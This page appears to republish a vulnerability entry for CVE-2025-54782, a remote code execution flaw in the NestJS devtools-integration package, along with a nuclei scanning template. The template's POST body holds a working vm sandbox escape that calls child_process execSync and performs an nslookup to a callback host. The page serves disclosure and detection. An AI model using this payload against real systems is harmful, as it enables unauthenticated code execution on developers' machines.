NestJS DevTools Integration Remote Code Execution Vulnerability

漏洞信息

漏洞名称: NestJS DevTools Integration Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-54782

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: NestJS是一个用于构建可扩展Node.js服务器端应用的框架。在0.2.0及以下版本的@nestjs/devtools-integration包中发现了一个严重的远程代码执行(RCE)漏洞。当启用时,该包会暴露一个本地开发HTTP服务器,其API端点使用了一个不安全的JavaScript沙箱(类似于safe-eval的实现)。由于沙箱化不当和缺少跨源保护,任何开发者访问的恶意网站都可以在其本地机器上执行任意代码。该包向本地运行的NestJS开发服务器添加了HTTP端点。其中一个端点/inspector/graph/interact接受包含code字段的JSON输入,并在Node.js vm.runInNewContext沙箱中执行提供的代码。此漏洞的修复版本为0.2.1。该漏洞的影响极为严重,因为它允许攻击者在开发者的本地机器上执行任意代码,无需任何形式的认证,且可以自动利用。这可能导致数据泄露、服务中断或其他恶意活动。

产品厂商: NestJS

产品名称: @nestjs/devtools-integration

影响版本: version <= 0.2.0

搜索语法: devtools.nestjs.com

来源: https://github.com/projectdiscovery/nuclei-templates/blob/f6951786d3bf6135926d4cf9bfae901ffd175ec5/http%2Fcves%2F2025%2FCVE-2025-54782.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

id: CVE-2025-54782

info:
  name: NestJS DevTools Integration - Remote Code Execution
  author: nukunga
  severity: critical
  description: |
    Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox.
  remediation: This is fixed in version 0.2.1.
  reference:
    - https://socket.dev/blog/nestjs-rce-vuln
    - https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54782
  classification:
    cvss-metrics: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 9.4
    cve-id: CVE-2025-54782
    cwe-id: CWE-77,CWE-352,CWE-78
  metadata:
    verified: true
    max-request: 1
    shodan-query: "devtools.nestjs.com"
  tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth

http:
  - raw:
      - |
        POST /inspector/graph/interact HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain

        {"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: content_type
        words:
          - "application/plain"

      - type: status
        status:
          - 200


Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
NestJS DevTools Integration Remote Code Execution Vulnerability
http://example.com/2025/08/03/github_967076224/
作者
lianccc
发布于
2025年8月3日
许可协议